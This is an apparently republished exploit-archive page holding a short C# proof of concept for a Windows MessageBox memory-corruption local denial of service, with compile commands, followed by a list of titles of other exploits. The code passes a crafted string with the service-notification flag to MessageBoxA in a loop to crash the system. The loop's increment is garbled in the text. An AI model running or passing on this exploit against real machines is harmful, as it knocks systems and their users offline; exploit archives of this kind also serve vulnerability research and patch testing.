// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType); static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i<10; i )
MessageBoxA(0u, pHelloBug, pHelloBug, MB_SERVICE_NOTIFICATION);
}
}
}
// >> csc /unsafe mbox.cs
// >> mbox.exe//http://www.leftworld.net
【MS Windows (MessageBox) Memory Corruption Local Denial of Service】相关文章:
★ minb 0.1.0 Remote Code Execution Exploit
★ MS Internet Explorer Recordset Double Free Memory Exploit
★ HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
★ Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
★ TGS CMS 0.3.2r2 Remote Code Execution Exploit
★ MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
★ Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability
★ Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ LoveCMS 1.6.2 Final Remote Code Execution Exploit